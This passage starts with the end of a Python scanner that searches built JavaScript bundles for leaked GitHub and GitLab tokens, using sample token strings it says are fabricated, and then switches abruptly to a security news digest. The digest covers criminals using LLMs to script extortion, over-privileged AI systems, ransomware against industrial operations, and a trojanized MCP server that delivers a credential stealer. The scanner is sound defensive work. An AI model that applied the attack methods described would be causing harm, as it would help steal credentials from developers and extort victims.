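        for kind, pat in PATTERNS.items():
            for m in pat.finditer(line):
                tok = m.group(0)
                if not is_placeholder(tok):
                    findings.append((kind, line_no, redact(tok)))
    return findings


# Constructed minified-bundle excerpt; every token in it is a fabricated stand-in.
PLACEHOLDER = "ghp_" + "x" * 36
SAMPLE_BUNDLE = (
    'const api=axios.create({baseURL:"https://api.github.com",'
    'headers:{Authorization:"token ghp_A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q7r8"}});\n'
    f"// docs example, should be ignored: {PLACEHOLDER}\n"
    'export const gl={token:"glpat-xY9zQ2wE7rT4uI1oP6aS",host:"gitlab.example"};\n'
)

if __name__ == "__main__":
    for kind, line_no, tok in scan_bundle(SAMPLE_BUNDLE):
        print(f"{kind} at line {line_no}: {tok}")
```

Run it over the emitted `dist/` bundles rather than the source tree: the leak path the study describes is build-time inlining of environment variables into front-end code, which source-only scanners never see. Whether a hit is still live has to be confirmed against the provider's API with the token itself, which this offline scanner deliberately does not do.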

Low-Skilled Cybercriminals Use AI for Vibe Extortion Attacks

Updated: · First: 17.02.2026 15:45 · 📰 1 src / 1 articles

Low-skilled cybercriminals are leveraging AI to enhance their extortion campaigns, a technique dubbed 'vibe extortion' by researchers. This involves using large language models (LLMs) to script professional extortion strategies, including deadlines and pressure tactics. While the attackers themselves lack technical depth, AI provides coherence and professionalism to their threats. The use of AI in cybercrime has evolved beyond simple grammar improvements to include rapid vulnerability scanning, parallelized targeting, and automated ransomware tasks. Unit 42 researchers highlight that AI acts as a 'force multiplier' for attackers, significantly reducing operational friction and lowering the barrier to entry for cybercriminals.

Over-Privileged AI Systems Linked to Higher Incident Rates

Updated: · First: 17.02.2026 15:00 · 📰 1 src / 1 articles

A new report from Teleport reveals that AI systems with excessive access rights experience significantly higher incident rates. Over 69% of security leaders believe identity management must evolve to mitigate risks in AI infrastructure. Organizations with over-privileged AI systems report a 76% incident rate, compared to 17% for those with least-privilege controls, indicating a 4.5 times higher risk. The report highlights that static credentials and complex IT infrastructures contribute to these security issues.

Rise in Ransomware Attacks Targeting Industrial Operations

Updated: · First: 17.02.2026 14:50 · 📰 1 src / 1 articles

A significant increase in ransomware attacks targeting industrial organizations has been observed, with 119 groups identified in 2025, a 49% rise from 2024. These attacks exploited weaknesses in operational technology (OT) and industrial control systems (ICS), affecting 3,300 industrial organizations globally. The manufacturing sector was the most targeted, followed by transportation, oil and gas, electricity, and communications. Attackers commonly abused legitimate login credentials obtained through phishing, infostealer malware, or dark web purchases to compromise networks and deploy ransomware. The average dwell time for ransomware in OT environments was 42 days, causing operational disruptions and multi-day outages. Three new threat groups, Sylvanite, Azurite, and Pyroxene, were identified, each with distinct tactics targeting industrial systems.

SmartLoader Campaign Uses Trojanized Oura MCP Server to Deploy StealC Infostealer

Updated: · First: 17.02.2026 14:42 · 📰 1 src / 1 articles

A new SmartLoader campaign involves distributing a trojanized version of the Oura Model Context Protocol (MCP) server to deliver the StealC infostealer. The attackers cloned the legitimate Oura MCP Server, created fake GitHub repositories and contributors to build credibility, and submitted the trojanized server to MCP registries. The campaign targets developers, stealing credentials, browser passwords, and cryptocurrency wallet data. The attack unfolded over four stages, involving the creation of fake GitHub accounts, repositories, and contributors, followed by submission to MCP Market. The trojanized server executes an obfuscated Lua script that drops SmartLoader, which then deploys StealC. The evolution of SmartLoader indicates a shift towards targeting developers, whose systems contain sensitive data like API keys and cloud credentials.